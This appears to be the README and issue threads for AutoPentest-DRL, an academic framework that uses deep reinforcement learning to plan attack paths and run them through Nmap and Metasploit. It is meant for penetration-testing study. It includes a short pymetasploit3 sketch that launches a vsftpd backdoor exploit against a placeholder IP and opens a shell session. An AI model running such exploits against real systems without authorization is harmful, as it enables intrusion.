AutoPentest-DRL: Automated Penetration Testing Using Deep Reinforcement Learning

Overview

AutoPentest-DRL is an automated penetration testing framework based on Deep Reinforcement Learning (DRL) techniques. AutoPentest-DRL can determine the most appropriate attack path for a given logical network, and can also be used to execute a penetration testing attack on a real network via tools such as Nmap and Metasploit. This framework is intended for educational purposes, so that users can study the penetration testing attack mechanisms. AutoPentest-DRL is being developed by the Cyber Range Organization and Design (CROND) NEC-endowed chair at the Japan Advanced Institute of Science and Technology (JAIST) in Ishikawa, Japan.

An overview of AutoPentest-DRL is shown below. The framework receives user input regarding the logical target network, including vulnerability information; alternatively, the framework can use Nmap for network scanning to find actual vulnerabilities in a real target network with known topology. The MulVAL attack-graph generator is then used to determine potential attack trees, which are fed in a simplified form into the DQN Decision Engine. The attack path that is produced as output can be used to study the attack mechanisms on a large number of logical networks. Alternatively, the framework can use the attack path with penetration testing tools, such as Metasploit, making it possible for the user to study how the attack can be carried out on a real target network.
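
To make this flow more concrete, below is a minimal Python sketch of how the MulVAL stage could be driven and its output reduced to the simplified node information that the DQN Decision Engine works on. The script location follows the repos/mulval installation directory mentioned under Prerequisites, but the output directory, command-line flags, and CSV layout are assumptions for illustration, not the framework's actual implementation.

    import csv
    import subprocess
    from pathlib import Path

    # Assumed locations; adjust to your installation (see Prerequisites below).
    MULVAL_SCRIPT = Path("repos/mulval/utils/graph_gen.sh")  # MulVAL helper script
    RESULT_DIR = Path("mulval_result")                       # where MulVAL output is expected

    def generate_attack_graph(topology_file):
        """Invoke MulVAL on a .P topology description (flags are illustrative)."""
        subprocess.run(["sh", str(MULVAL_SCRIPT), topology_file, "-v"], check=True)

    def load_vertices():
        """Parse VERTICES.CSV (node id, label, type, metric) into {id: label}."""
        vertices = {}
        with open(RESULT_DIR / "VERTICES.CSV", newline="") as f:
            for row in csv.reader(f):
                vertices[int(row[0])] = row[1]
        return vertices

    if __name__ == "__main__":
        generate_attack_graph("MulVAL_P/logical_attack_v1.P")
        print(load_vertices())  # simplified node information handed to the decision engine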

Figure: Overview of AutoPentest-DRL

Next, we provide brief information on how to set up and use AutoPentest-DRL. For details about its operation, please refer to the User Guide that we also make available.

Prerequisites

Several external tools are required in order to use AutoPentest-DRL; for the basic functionality (DQN training and attacks on logical networks), you'll need:

  • MulVAL: Attack-graph generator used by AutoPentest-DRL to produce possible attack paths for a given network. See the MulVAL page for installation instructions and dependencies. MulVAL should be installed in the directory repos/mulval in the AutoPentest-DRL folder. You also need to configure the /etc/profile file as discussed here. On some systems the tool epstopdf may also need to be installed, for instance by using the command below:
    sudo apt install texlive-font-utils
    

If you plan to use AutoPentest-DRL with real networks, you'll also need:

  • Nmap: Network scanner used by AutoPentest-DRL to determine vulnerabilities in a given real network. The command needed to install nmap on Ubuntu is given below:
    sudo apt install nmap
    
  • Metasploit: Penetration testing framework used by AutoPentest-DRL to actually conduct the attack proposed by the DQN engine on the real target network. To install Metasploit, you can use the installers made available on the Metasploit website. In addition, we use pymetasploit3 as an RPC API to communicate with Metasploit; this tool needs to be installed in the directory Penetration_tools/pymetasploit3 by following its author's instructions (a minimal connection sketch is shown after this list).
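
As a concrete illustration of the Metasploit integration point, below is a minimal sketch that uses pymetasploit3 to talk to a running Metasploit RPC daemon (started beforehand, e.g. with msfrpcd -P yourpassword). The password, target address, and module names are placeholders for illustration; this is not the framework's own attack logic.

    from pymetasploit3.msfrpc import MsfRpcClient

    # Connect to a running msfrpcd instance; credentials and port are placeholders.
    client = MsfRpcClient('yourpassword', server='127.0.0.1', port=55553, ssl=True)

    # Select an exploit module and a payload; the module names are only examples.
    exploit = client.modules.use('exploit', 'unix/ftp/vsftpd_234_backdoor')
    exploit['RHOSTS'] = '192.168.1.10'
    payload = client.modules.use('payload', 'cmd/unix/interact')

    # Launch the exploit and list any sessions that were opened.
    exploit.execute(payload=payload)
    print(client.sessions.list)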

Setup

AutoPentest-DRL has been developed mainly on the Ubuntu 18.04 LTS operating system; other OSes may work, but have not been tested. In order to set up AutoPentest-DRL, use the releases page to download the latest version, and extract the source code archive into a directory of your choice (for instance, your home directory) on the host on which you intend to use it.

AutoPentest-DRL is implemented in Python, and it requires several packages to run. The file requirements.txt included with the distribution can be used to install the necessary packages via the following command that should be run from the AutoPentest-DRL/ directory:

$ sudo -H pip install -r requirements.txt

Quick Start

AutoPentest-DRL includes a trained DQN model, so you can use it out-of-the-box on a sample logical network topology by running the following command in a terminal from the AutoPentest-DRL/ directory:

$ python3 ./AutoPentest-DRL.py logical_attack

In this logical attack mode no actual attack is conducted: AutoPentest-DRL only determines the optimal attack path for the logical network topology described in the file MulVAL_P/logical_attack_v1.P. By comparing the output path with the visualization of the attack graph generated by MulVAL in the file mulval_result/AttackGraph.pdf, you can study the attack steps in detail.
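
To give a feel for why a reward-driven agent can recover the optimal path from a simplified attack matrix, here is a small self-contained toy example. It uses tabular Q-learning on a made-up reward matrix instead of the framework's actual DQN model and data, so the matrix, rewards, and hyperparameters are purely illustrative.

    import numpy as np

    # Toy "simplified attack matrix": entry [i][j] is the reward for moving from
    # node i to node j, and -1 marks transitions that do not exist. The values
    # are made up for illustration; they are not an AutoPentest-DRL artifact.
    R = np.array([
        [-1, 10,  5, -1],
        [-1, -1, -1, 40],
        [-1, -1, -1, 20],
        [-1, -1, -1, -1],   # node 3 is the attack goal (terminal state)
    ])
    GOAL, GAMMA, ALPHA, EPISODES = 3, 0.9, 0.5, 200

    Q = np.zeros_like(R, dtype=float)
    rng = np.random.default_rng(0)

    for _ in range(EPISODES):
        state = 0                             # always start from the entry node
        while state != GOAL:
            actions = np.flatnonzero(R[state] >= 0)
            action = rng.choice(actions)      # explore randomly
            target = R[state, action] + GAMMA * Q[action].max()
            Q[state, action] += ALPHA * (target - Q[state, action])
            state = action

    # Greedy path extraction: follow the highest-valued action from the start node.
    state, path = 0, [0]
    while state != GOAL:
        state = int(np.argmax(Q[state]))
        path.append(state)
    print("Learned attack path:", path)

Running the sketch prints the path 0 -> 1 -> 3, the sequence with the highest cumulative reward in the toy matrix; the gradual improvement of the Q-values over episodes mirrors, in a much simpler setting, how the DQN's reward increases during training.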

For more information about the operation modes of AutoPentest-DRL, including the real attack mode and the training mode, see our User Guide.

References

For a research background regarding AutoPentest-DRL, please refer to the following references:

  • Z. Hu, R. Beuran, Y. Tan, "Automated Penetration Testing Using Deep Reinforcement Learning", IEEE European Symposium on Security and Privacy Workshops (EuroS&PW 2020), Workshop on Cyber Range Applications and Technologies (CACOE'20), Genova, Italy, September 7, 2020, pp. 2-10.
  • Z. Hu, "Automated Penetration Testing Using Deep Reinforcement Learning", Master's thesis, March 2021. https://hdl.handle.net/10119/17095

For a list of contributors to this project, see the file CONTRIBUTORS included in the distribution.

Comments
  • mulval topology template

    Hello, I just want to ask: if I change the configuration of the topology generator, do I also have to change the content of the topo_gen_template.P file, or is it a generic template? Thanks.

    opened by shoaib5261 7
  • Evaluating the model

    Thank you for your support, but I have one more question. In the paper you wrote that this model has an accuracy of 0.86. I don't quite understand the evaluation method, the data used for evaluation, and whether that data is included in this repo.

    Also, can you explain why the model has to be trained multiple times and why the reward increases gradually? I think the simplified matrix holds all the possible paths, so the model just needs to loop through all paths and print the desired one. Sorry for my weak understanding.

    Looking forward to your reply. Thank you!

    opened by QuynhNguyen269 5
  • FileNotFound error

    Hi, I'm trying to run the code but it gives me multiple FileNotFound errors. Please help. Thank you!

    The output is:

    ################################################################################
    AutoPentest-DRL: Automated Penetration Testing Using Deep Reinforcement Learning
    ################################################################################
    AutoPentest-DRL: Operation mode: Attack on logical network
    AutoPentest-DRL: Target topology: MulVAL_P/logical_topology_1.P

    AutoPentest-DRL: Compute attack path for logical network...
    Generate attack graph using MulVAL...
    sh: 1: ../repos/mulval/utils/graph_gen.sh: not found
    Process attack graph into attack matrix...
    Traceback (most recent call last):
      File "/home/leekutti/NT522/AutoPentest-DRL/DQN/./confirm_path.py", line 9, in <module>
        MAP = generateMapClass.sendMap
      File "./learn/generateMap.py", line 108, in sendMap
        self.x = self.createMatrix()
      File "./learn/generateMap.py", line 20, in createMatrix
        self.csvfile = open('../mulval_result/VERTICES.CSV', 'r')
    FileNotFoundError: [Errno 2] No such file or directory: '../mulval_result/VERTICES.CSV'
    Traceback (most recent call last):
      File "/home/leekutti/NT522/AutoPentest-DRL/DQN/learn/./dqn_learn.py", line 32, in <module>
        env = gym.make('dqnenv-v0')
      File "/usr/local/lib/python3.9/dist-packages/gym/envs/registration.py", line 235, in make
        return registry.make(id, **kwargs)
      File "/usr/local/lib/python3.9/dist-packages/gym/envs/registration.py", line 129, in make
        env = spec.make(**kwargs)
      File "/usr/local/lib/python3.9/dist-packages/gym/envs/registration.py", line 89, in make
        cls = load(self.entry_point)
      File "/usr/local/lib/python3.9/dist-packages/gym/envs/registration.py", line 27, in load
        mod = importlib.import_module(mod_name)
      File "/usr/lib/python3.9/importlib/__init__.py", line 127, in import_module
        return _bootstrap._gcd_import(name[level:], package, level)
      File "<frozen importlib._bootstrap>", line 1030, in _gcd_import
      File "<frozen importlib._bootstrap>", line 1007, in _find_and_load
      File "<frozen importlib._bootstrap>", line 986, in _find_and_load_unlocked
      File "<frozen importlib._bootstrap>", line 680, in _load_unlocked
      File "<frozen importlib._bootstrap_external>", line 790, in exec_module
      File "<frozen importlib._bootstrap>", line 228, in _call_with_frames_removed
      File "/home/leekutti/NT522/AutoPentest-DRL/DQN/learn/env/environment.py", line 12, in <module>
        class dqnEnvironment(gym.Env):
      File "/home/leekutti/NT522/AutoPentest-DRL/DQN/learn/env/environment.py", line 14, in dqnEnvironment
        MAP = np.loadtxt('../processdata/newmap.txt')
      File "/usr/lib/python3/dist-packages/numpy/lib/npyio.py", line 961, in loadtxt
        fh = np.lib._datasource.open(fname, 'rt', encoding=encoding)
      File "/usr/lib/python3/dist-packages/numpy/lib/_datasource.py", line 195, in open
        return ds.open(path, mode, encoding=encoding, newline=newline)
      File "/usr/lib/python3/dist-packages/numpy/lib/_datasource.py", line 535, in open
        raise IOError("%s not found." % path)
    OSError: ../processdata/newmap.txt not found.

    opened by QuynhNguyen269 3
  • AssertionError: The environment must specify an observation space

    Hi everyone, please help. Thank you!

    The output is:
    Process attack graph into attack matrix...
    Traceback (most recent call last):
      File "./dqn_learn.py", line 32, in <module>
        env = gym.make('dqnenv-v0')
      File "/usr/local/lib/python3.7/dist-packages/gym/envs/registration.py", line 685, in make
        env = PassiveEnvChecker(env)
      File "/usr/local/lib/python3.7/dist-packages/gym/wrappers/env_checker.py", line 26, in __init__
        ), "The environment must specify an observation space. https://www.gymlibrary.ml/content/environment_creation/"
    AssertionError: The environment must specify an observation space. https://www.gymlibrary.ml/content/environment_creation/

    opened by VisaCai 2
  • about article

    In the article "Automated Penetration Testing Using Deep Reinforcement Learning" we found an accuracy metric, and I am confused: is the accuracy measured between the best DQN penetration path and the true path, or something else?

    opened by lixiaohaao 1
  • target drone

    Sorry to bother you frequently. Regarding the construction of a multi-level network, like the network in your experiment, could you elaborate on how to build it?

    Looking forward to your reply. Lixiao

    opened by lixiaohaao 1
Releases(1.0)
  • 1.0(Jun 1, 2021)

    First release of AutoPentest-DRL, an automated penetration testing framework based on Deep Reinforcement Learning (DRL) techniques. The framework can determine the most appropriate attack path for a given logical network, and can also be used to execute a penetration testing attack on a real network via tools such as Nmap and Metasploit.

    Source code(tar.gz)
    Source code(zip)
Owner
Cyber Range Organization and Design Chair
Cyber Range Organization and Design (CROND) NEC-endowed chair at JAIST conducts R&D on cybersecurity education and training